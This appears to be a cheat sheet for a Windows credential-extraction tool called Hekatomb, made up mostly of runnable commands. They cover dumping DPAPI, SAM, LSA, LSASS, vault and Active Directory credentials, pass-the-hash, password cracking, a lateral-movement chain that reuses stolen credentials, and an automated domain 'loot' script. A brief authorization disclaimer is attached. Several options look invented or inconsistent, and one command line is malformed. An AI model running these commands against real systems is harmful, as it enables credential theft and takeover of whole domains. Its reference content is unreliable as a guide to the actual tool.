Hekatomb is a specialized security testing tool designed to extract and decrypt credentials stored via Windows DPAPI (Data Protection API) on Active Directory systems. It’s used by authorized penetration testers and red teamers to assess the security of credential storage mechanisms in Windows environments. Hekatomb can recover credentials, perform lateral movement testing, and identify credential exposure risks.
This tool is strictly for authorized penetration testing, security assessments, and authorized red team operations on systems you own or have explicit written permission to test. Unauthorized credential extraction is illegal.
# Download from GitHub releases
# Or clone repository
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
# Requirements: Python 3.7+
pip install -r requirements.txt
sudo apt-get install git python3 python3-pip
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
pip3 install -r requirements.txt
brew install python3 git
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
pip3 install -r requirements.txt
python3 hekatomb.py --help
python3 hekatomb.py --version
| Requirement | Details |
|---|
| OS | Windows with DPAPI or AD integration |
| Privileges | Administrator or SYSTEM context |
| Network Access | Domain controller access for AD operations |
| Python | 3.7+ on attacking machine (Linux/macOS) |
| Impacket | Required for AD operations |
# Domain admin credentials for full functionality
# Or local admin on target system
# Format for credential specification:
# domain/username:password
# username@domain:password
| Command | Description |
|---|
python3 hekatomb.py -t target.example.com | Extract from domain target |
python3 hekatomb.py -u user -p pass target.com | Specify credentials |
python3 hekatomb.py -target IP -domain DOMAIN | IP-based with domain |
python3 hekatomb.py --help | Display help menu |
# Basic extraction from domain
python3 hekatomb.py -t dc.example.com
# With explicit credentials
python3 hekatomb.py -u administrator -p MyP@ssw0rd! -t dc.example.com
# Domain specification
python3 hekatomb.py -u CORP\\administrator -p password -t 192.168.1.10
# Hash-based (pass-the-hash)
python3 hekatomb.py -u administrator -H aabbccdd... -t dc.example.com
| Command | Description |
|---|
hekatomb -t target -method dpapi | Decrypt DPAPI protected data |
hekatomb -t target -local | Extract local user credentials |
hekatomb -t target -cached | Extract cached logon credentials |
hekatomb -t target -vault | Extract Windows Vault credentials |
# Extract all DPAPI-protected credentials
python3 hekatomb.py -t dc.example.com -method dpapi
# Local user extraction
python3 hekatomb.py -t workstation.local -local
# Cached credentials
python3 hekatomb.py -t pc01.example.com -cached
# Vault credentials (RDP, etc.)
python3 hekatomb.py -t target.com -vault
| Command | Description |
|---|
hekatomb -t DC -domain DOMAIN -u admin -p pass | Full domain extraction |
hekatomb -t DC -domain DOMAIN -users | Extract user credentials |
hekatomb -t DC -domain DOMAIN -computers | Extract computer accounts |
hekatomb -t DC -loot | Collect all available credentials |
# Full domain credential extraction
python3 hekatomb.py -t 10.0.0.1 -domain CORP -u admin -p MyPassword123
# User-only extraction
python3 hekatomb.py -t dc.corp.local -domain CORP -users -u CORP\\admin -p pass
# Computer account extraction
python3 hekatomb.py -t dc.example.com -computers -u administrator -p password
# Comprehensive looting
python3 hekatomb.py -t primary-dc -domain COMPANY -u admin -p pass -loot
| Target | Description |
|---|
| LSA Secrets | Stored system credentials |
| SAM Database | Local user password hashes |
| LSASS Memory | Active session credentials |
| Windows Vault | Stored website/service credentials |
| Cached Logons | Offline domain logon cache |
| RDP Credentials | Remote desktop connection data |
# Extract LSA secrets
python3 hekatomb.py -t target -lsa
# SAM database
python3 hekatomb.py -t target -sam
# LSASS memory dump
python3 hekatomb.py -t target -lsass
# RDP cached credentials
python3 hekatomb.py -t target -rdp
# All credential types
python3 hekatomb.py -t target -all
| Flag | Description |
|---|
-o output.txt | Save to text file |
-csv | CSV format output |
-json | JSON format output |
-v | Verbose output with details |
# Save credentials to file
python3 hekatomb.py -t dc.example.com -o credentials.txt
# CSV export for analysis
python3 hekatomb.py -t dc.example.com -csv > extracted_creds.csv
# JSON format for integration
python3 hekatomb.py -t dc.example.com -json > creds.json
# Verbose logging
python3 hekatomb.py -t dc.example.com -v -o verbose_results.txt
Format varies by source:
LSA Secrets:
[LSA_SECRET] Name: ServiceName | Value: credential_data
SAM Hashes:
[SAM_HASH] Username: hash_value
Vault Credentials:
[VAULT] Type: RDP | Username: user | Password: pass
Active Directory:
[AD_USER] samAccountName | Password or Hash
| Flag | Description |
|---|
-u username | Specify username |
-p password | Specify password |
-H hash | NTLM hash (pass-the-hash) |
-k | Kerberos authentication |
-aes key | AES encryption key (impacket) |
# Standard credentials
python3 hekatomb.py -t dc.example.com -u DOMAIN\\admin -p password
# Pass-the-hash attack
python3 hekatomb.py -t dc.example.com -u administrator -H aabbccddeeff00112233445566778899
# Kerberos authentication
python3 hekatomb.py -t dc.example.com -k
# AES key authentication
python3 hekatomb.py -t dc.example.com -u admin -aes 0102030405060708090a0b0c0d0e0f10
| Command | Description |
|---|
hekatomb -t target -extract -lateral | Extract for lateral movement |
hekatomb -t target -dump-all | Complete credential dump |
hekatomb -t target -crack | Attempt credential cracking |
# Extract credentials for lateral movement
python3 hekatomb.py -t compromised_workstation -lateral
# Dump all recoverable credentials
python3 hekatomb.py -t dc.example.com -dump-all
# Extract and crack weak passwords
python3 hekatomb.py -t target -crack -wordlist /usr/share/wordlists/rockyou.txt
# Extract from first compromised system
python3 hekatomb.py -t host1.example.com -o host1_creds.txt
# Use extracted credentials on next target
python3 hekatomb.py -t host2.example.com -u DOMAIN\\extracted_user -p extracted_password
# Continue lateral movement
python3 hekatomb.py -t host3.example.com -H extracted_hash
#!/bin/bash
# Comprehensive domain assessment
DOMAIN="EXAMPLE.COM"
DC="dc.example.com"
ADMIN="EXAMPLE\\administrator"
PASS="Password123!"
echo "[*] Starting Hekatomb Domain Assessment"
echo "[*] Target: $DOMAIN"
# Step 1: Extract user credentials
echo "[+] Extracting user credentials..."
python3 hekatomb.py -t $DC -u $ADMIN -p $PASS -users -o domain_users.txt
# Step 2: Extract computer accounts
echo "[+] Extracting computer accounts..."
python3 hekatomb.py -t $DC -u $ADMIN -p $PASS -computers -o domain_computers.txt
# Step 3: LSA secrets
echo "[+] Extracting LSA secrets..."
python3 hekatomb.py -t $DC -u $ADMIN -p $PASS -lsa -o lsa_secrets.txt
# Step 4: Complete loot
echo "[+] Comprehensive credential collection..."
python3 hekatomb.py -t $DC -u $ADMIN -p $PASS -loot -json -o complete_loot.json
echo "[+] Assessment complete"
# Create credential database
python3 hekatomb.py -t dc.example.com -u admin -p password -json > all_credentials.json
# Parse for analysis
jq '.credentials[] | {type: .type, username: .username}' all_credentials.json
# Count credential types
jq '.credentials[] | .type' all_credentials.json | sort | uniq -c
# Document authorization
cat > assessment_scope.txt << EOF
Hekatomb Security Assessment
Date: $(date)
Authorized Tester: [Name]
Target Domain: EXAMPLE.COM
Scope: All domain-joined systems
Purpose: Credential security assessment
Approval: [Manager Name/Signature]
EOF
# Begin assessment
python3 hekatomb.py -t dc.example.com -u authorized_admin -p approved_password -v | tee assessment_results.log
# Identify weak credential storage
python3 hekatomb.py -t dc.example.com -u admin -p pass -json > findings.json
# Generate report
cat > report.txt << EOF
Credential Storage Assessment Results
=====================================
1. DPAPI Vulnerability Analysis:
$(jq '.dpapi_findings[]' findings.json)
2. Cleartext Storage Issues:
$(jq '.cleartext_credentials[]' findings.json)
3. Weak Hash Detection:
$(jq '.weak_hashes[]' findings.json)
EOF
# Test domain connectivity
nmap -p 445,389 dc.example.com
# Verify credentials
python3 -m impacket.examples.secretsdump DOMAIN/user:pass@target
# Debug connection
python3 hekatomb.py -t dc.example.com -u admin -p pass -v
# Verify DPAPI access
python3 hekatomb.py -t target -test-dpapi
# Check Windows Vault availability
python3 hekatomb.py -t target -vault -v
# LSA Secrets access test
python3 hekatomb.py -t target -lsa -v
# If standard admin insufficient, ensure SYSTEM context
sudo python3 hekatomb.py -t target (Linux attacking target)
# On Windows, run as Administrator
python3 hekatomb.py -t target -u admin -p pass
- secretsdump - Impacket’s credential extraction
- mimikatz - Windows credential dumping (on-target)
- hashcat - Hash cracking
- responder - Network credential capturing
- crackmapexec - Post-exploitation automation
- bloodhound - AD enumeration and analysis
# Document all findings
python3 hekatomb.py -t dc.example.com -u admin -p pass -comprehensive-report
# Prepare remediation guidance
cat > remediation.txt << EOF
1. Update credential storage mechanisms
2. Implement DPAPI hardening
3. Enforce strong password policies
4. Monitor for suspicious credential access
5. Regular security assessments
EOF
# Securely dispose of credentials
shred -vfz -n 5 all_credentials.json
# Only test in authorized lab/production environments
# Ensure air-gapped network for sensitive assessment
# Document all activities with timestamps
# Maintain chain of custody for findings
# Secure credential handling
python3 hekatomb.py -t target -u admin -p pass > creds.txt
chmod 600 creds.txt
gpg -e -r security@company.com creds.txt
shred -vfz creds.txt
